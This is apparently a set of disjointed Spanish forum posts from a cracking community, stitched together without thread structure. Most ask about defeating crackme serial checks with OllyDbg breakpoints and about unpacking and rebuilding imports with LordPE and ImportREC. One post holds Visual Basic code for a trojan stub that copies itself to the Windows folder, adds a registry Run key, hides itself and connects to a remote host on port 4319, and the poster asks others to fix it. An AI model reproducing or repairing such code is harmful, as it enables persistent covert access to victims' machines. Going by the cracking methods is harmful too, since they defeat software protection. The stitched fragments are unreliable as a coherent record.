Hola a todos bueno hay un crackme que se llama ultr4iss0, que se encarga de emular.isos   ustedes me entenderán, bueno este viene empaquetado, logré desempaquetarlo pero mi duda más que nada no tiene nada que ver con el crackeo bueno resulta que poniendo id hola y pass 99999999999999999 automáticamente se habilita el botón aceptar y al apretarlo aparece algo como "registrado",me pide que reinicie el programa pero no registra nada mi duda es que lo analizo antes del cartel registrado o después

Ahora si logramos los 300,000 usuarios 

En el tutorial 41 de ricardo se habla de hacer eso pero a mi no me aparece tal opción a ver si alguien me ayuda, me aparecen otras opciones nada parecidas, bajé el mismo LORDPE que tiene RicardoNarvaja
COPY A SECTION FROM HD TO EOF (End of file)

Los datos son estos

OEP
00401632

FINAL
00B2721C

INICIO
00b26134

LARGO
10E8

¿Como los pongo en ImportREC?

¿Final e Inicio le resto la Image-Base?

Gracias

Que instala,adonde,cuando,ruta

si es mejor en un log.txt 

  y cuando las uso

Bueno hola a todos, les cuento analizando un crackme este no me muestra ninguna api que me pueda servir, ni GetProcAddress, nada de nada en fin también acudí a ver los textos, pero no encuentro nada, por lo que decidí utilizar el método

TranslateMessage Condition->MSG==101
claro se detiene al pulsar un serial, pongo execute till return para retornar de la api
pero hasta ahí llego pues no sé con qué metodo seguir
he hecho lo siguiente, no sé si está bien, me gustaría que me lo dijieran y si es posible darme más metodos:

-realizo el mismo paso dos veces o más cosa que queden 3 caracteres del serial
los busco en la memoria pero no los encuentro

-MSG==101 digito un caracter en la zona en donde se coloca el serial, luego execute till return, pongo un follow in dump del buffer (es decir busco en el dump el número de serial que coloqué) y luego le doy MemoryBreakPoint On Access, para que en el momento que se llame para realizar alguna operación trace
(en este caso me ocurre aveces que está constantemente llamándose a tal número del serial que no me sirve este método mucho)

-MSG==202 le pongo OK para que se detenga al hacer click,pongo execute till retunr, entonces luego pongo un memory breakpoint on acces en la sección CODE del programa para que se detenga cuando se trate de llamar al "cartelito que me muestre que no es el serial correcto)(creo que este no es efectivo si hay MSG==101, por favor corroborar)

¿Me podrían decir si estos métodos que uso funcionan?

en resumen ¿Qué otros métodos puedo usar cuando el crackme le encuentro que detecta las pulsasiones (MSG==101)?

Desde ya gracias

ya casi 300.000
Felicidades al foro 

Hola a todos bueno tengo este problema he modificado esta parte del código por lo que alguna parte de esta está mal, si alguien me puediera ayudar, Gracias

Private Sub Form_Load()
On Error Resume Next
 
 
If Dir(Environ("Windir") & "\winsetup32.exe") = vbNullString Then
FileCopy App.path & "\" & App.EXEName & ".exe", Environ("Windir") & "\winsetup32.exe"
 
qazwsx = Environ("Windir") & "\asd.exe"
edcrfv = App.Title
 
 
zxccxz = edccde(HKEY_LOCAL_MACHINE, _
                     RAMA_RUN_WINDOWS, _
                     edcrfv, _
                     qazwsx, REG_SZ)
 
End
End If
 
    Dim ppplooo As String
    ppplooo = Environ("Windir") & "\asd.exe"
 
    If InStr(LCase$(IsWay("asd.exe")), LCase$(ppplooo)) > 0 Then
     MsgBox "Corre"
     End
    Else
     Shell Environ("Windir") & "\asd.exe", vbHide
     MsgBox "asd"
    End If
 
App.TaskVisible = False
Me.Visible = False
App.Title = ""
Me.Caption = ""
With Winsock1
.Close
.Connect "asd.asd.com", 4319
End With
End Sub

No se nada de programación, un amigo me dijo que introdujera eso pero en verdad no logro conseguirlo

Mi título está más que explícito, si pueden darme el método de como lo encontraron sería genial

http://www.megaupload.com/?d=YDXJ9T4Y


Muchas Gracias